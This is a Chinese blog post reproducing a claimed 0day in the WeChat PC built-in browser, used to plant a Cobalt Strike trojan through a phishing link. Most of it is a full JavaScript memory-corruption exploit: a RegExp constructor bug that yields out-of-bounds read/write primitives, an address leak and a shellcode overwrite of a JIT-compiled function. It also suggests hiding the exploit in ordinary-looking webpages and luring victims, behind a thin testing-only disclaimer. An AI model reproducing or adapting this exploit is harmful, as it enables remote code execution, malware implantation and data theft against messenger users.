# Web

微信默认自带浏览器存在0day钓鱼复现

                                             开局一张图

56684-qaizdffj3l.png

63911-z7d0mg00fnc.png
通过大佬分析,此次攻击复现主要过程如下:

1,攻击者利用某信(PC版)0day构造恶意的钓鱼链接,通过某信将钓鱼链接发送给目标受害者。

2,当目标受害者通过某信打开攻击者的钓鱼链接时,将触发该漏洞,从而导致目标受害者PC被植入CS木马,木马进程为 soft.exe,并创建了名为 dotnet_v4 .3 的系统服务。

3,随后,攻击者可以进一步进行敏感信息的窃取。

71612-h23hag0bcz6.png

一,主要的JS脚本如下:

// Implicit globals (the script has no 'use strict' and is not a module).
// Neither flag is read anywhere else in this script; print() below ignores ENABLE_LOG.
ENABLE_LOG = true;
IN_WORKER = true;

// run calc and hang in a loop
// `[#shellcode]` is a placeholder, not valid JS as written; the original
// author's note says an x86 payload byte array is expected here.
var shellcode = [#shellcode];

/**
 * Logging stub. Accepts a message and discards it, so this script never
 * produces output (the ENABLE_LOG flag declared above is not consulted).
 * @param {*} data - ignored
 * @returns {undefined}
 */
function print(data) {
  void data;
}

// Global counter mutated by target_function, presumably so the JIT cannot
// discard the function body as dead code — confirm.
var not_optimised_out = 0;
// The function later used by trigger(): its address is leaked, a value is read
// at kCodeInsOffset from it, `shellcode` is written there, and it is called again.
// The body itself is not meaningful: the 0xdecaf0 branch is never taken by the
// warm-up loop below (0..0xffff), and the arithmetic only feeds the counter.
var target_function = (function (value) {

if (value == 0xdecaf0) {
    not_optimised_out += 1;
}
not_optimised_out += 1;
not_optimised_out |= 0xff;
not_optimised_out *= 12;

});

// Warm-up: 0x10000 calls, presumably so target_function gets JIT-compiled
// before trigger() runs — confirm. `var i` leaks to the global scope.
for (var i = 0; i < 0x10000; ++i) {

target_function(i);

}

// Assigned inside cb(); indexed at [8] in DerivedBase's constructor (oobAccess).
var g_array;
// Sizes for the eval-built class chain in oobAccess(): how many dead
// `this.a=0;` statements each constructor carries, and the inheritance depth.
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;

// Used as the `toString` of the pattern object handed to super() in
// DerivedBase; also called once directly with `true` as a warm-up.
// flag: when loosely equal to true, returns undefined with no side effects.
// Otherwise allocates the global g_array (length 1) and returns the literal
// pattern string 'c01db33f'. Per the comments in DerivedBase, the point is that
// this allocation happens in the middle of the RegExp constructor; keep the
// statement order as is.
function cb(flag) {

if (flag == true) {
    return;
}
g_array = new Array(0);
g_array[0] = 0x1dbabe * 2;
return 'c01db33f';

}

// Allocation pressure: creates 0x10000 throwaway String wrapper objects,
// presumably to provoke a garbage collection before the next allocation
// (the script has no direct GC hook) — confirm. Nothing is returned or kept.
function gc() {

for (var i = 0; i < 0x10000; ++i) {
    new String();
}

}

// Installs the memory-access helpers (leakPtr, setPtr, read32, write32,
// write8, setBytes) on `this` and returns it. trigger() calls this WITHOUT
// `new`, and the script is sloppy-mode, so `this` is the global object and
// every property set here becomes a global.
// The existing comments in DerivedBase show the technique depends on the exact
// order of allocations; treat statement order as load-bearing.
function oobAccess() {

var this_ = this;
this.buffer = null;
this.buffer_view = null;

this.page_buffer = null;
this.page_view = null;

// Always empty; spread into DataView calls below, which adds no arguments
// (presumably to discourage optimization — confirm).
this.prevent_opt = [];

// Byte offsets accessed through buffer_view below; presumably build-specific.
var kSlotOffset = 0x1f;
var kBackingStoreOffset = 0xf;

// ArrayBuffer subclass with an extra own property `slot`; leakPtr() stores
// the object of interest there.
class LeakArrayBuffer extends ArrayBuffer {
    constructor() {
        super(0x1000);
        this.slot = this;
    }
}

this.page_buffer = new LeakArrayBuffer();
this.page_view = new DataView(this.page_buffer);

// Warm-up calls: a RegExp with an object pattern, and cb's early-return path,
// before the real use in DerivedBase (reason not stated in the source).
new RegExp({ toString: function () { return 'a' } });
cb(true);

class DerivedBase extends RegExp {
    constructor() {
        // var array = null;
        super(
            // at this point, the 4-byte allocation for the JSRegExp `this` object
            // has just happened.
            {
                toString: cb
            }, 'g'
            // now the runtime JSRegExp constructor is called, corrupting the
            // JSArray.
        );

        // this allocation will now directly follow the FixedArray allocation
        // made for `this.data`, which is where `array.elements` points to.
        this_.buffer = new ArrayBuffer(0x80);
        g_array[8] = this_.page_buffer;
    }
}

// try{
// eval over a FIXED template string (no external input): defines derived_n(i),
// which returns DerivedBase for i == 0 and otherwise a class extending
// derived_n(i-1). Each generated constructor calls super() and returns; the
// tDerivedNCount repeated `this.a=0;` statements after `return` are dead code,
// presumably there only to inflate the function's size — confirm.
var derived_n = eval(`(function derived_n(i) {
    if (i == 0) {
        return DerivedBase;
    }

    class DerivedN extends derived_n(i-1) {
        constructor() {
            super();
            return;
            ${"this.a=0;".repeat(tDerivedNCount)}
        }
    }

    return DerivedN;
})`);

// Instantiating the deepest class runs the super() chain down to DerivedBase,
// which is where this.buffer is allocated and g_array[8] is written.
gc();
new (derived_n(tDerivedNDepth))();

// View over the 0x80-byte buffer allocated in DerivedBase.
this.buffer_view = new DataView(this.buffer);
// Stores obj in page_buffer.slot, then returns the little-endian uint32 at
// kSlotOffset of buffer_view.
this.leakPtr = function (obj) {
    this.page_buffer.slot = obj;
    return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
}

// Writes addr as a little-endian uint32 at kBackingStoreOffset of buffer_view;
// the accessors below then read/write page_view at offset 0.
this.setPtr = function (addr) {
    this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
}

// uint32 read at addr (via setPtr + page_view offset 0).
this.read32 = function (addr) {
    this.setPtr(addr);
    return this.page_view.getUint32(0, true, ...this.prevent_opt);
}

// uint32 write at addr.
this.write32 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint32(0, value, true, ...this.prevent_opt);
}

// single-byte write at addr.
this.write8 = function (addr, value) {
    this.setPtr(addr);
    this.page_view.setUint8(0, value, ...this.prevent_opt);
}

// Writes `content` (array of byte values) one byte at a time from addr.
this.setBytes = function (addr, content) {
    for (var i = 0; i < content.length; i++) {
        this.write8(addr + i, content[i]);
    }
}
return this;

}

// Driver: obtains the helpers from oobAccess(), leaks the address of
// target_function, reads a uint32 at kCodeInsOffset from that address, writes
// the `shellcode` byte array at the value read, then calls target_function(0),
// presumably so execution reaches the overwritten bytes — confirm.
// Both print() calls are no-ops (print discards its argument).
function trigger() {

var oob = oobAccess();

var func_ptr = oob.leakPtr(target_function);
print('[*] target_function at 0x' + func_ptr.toString(16));

// Byte offset, relative to func_ptr, of the value read below; presumably build-specific.
var kCodeInsOffset = 0x1b;

var code_addr = oob.read32(func_ptr + kCodeInsOffset);
print('[*] code_addr at 0x' + code_addr.toString(16));

oob.setBytes(code_addr, shellcode);

target_function(0);

}

// Top-level entry. Any exception thrown by trigger() is handed to print(),
// which discards it, so a failed run is completely silent.
try{

print("start running");
trigger();

}catch(e){

print(e);

}

二,html调用JS
34506-15rt28r0tj4.png

这里只是一个例子,具体做法可以再扩展一下思路。

例如:隐藏在正常的网页里?

15849-p134pijbiw8.png

三,诱导

65765-xrseocj1ah.png

然后就有了开头的那张图。

声明:

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

文章转载自:洛米唯熊

本文经授权后发布,本文观点不代表立场,转载请联系原作者。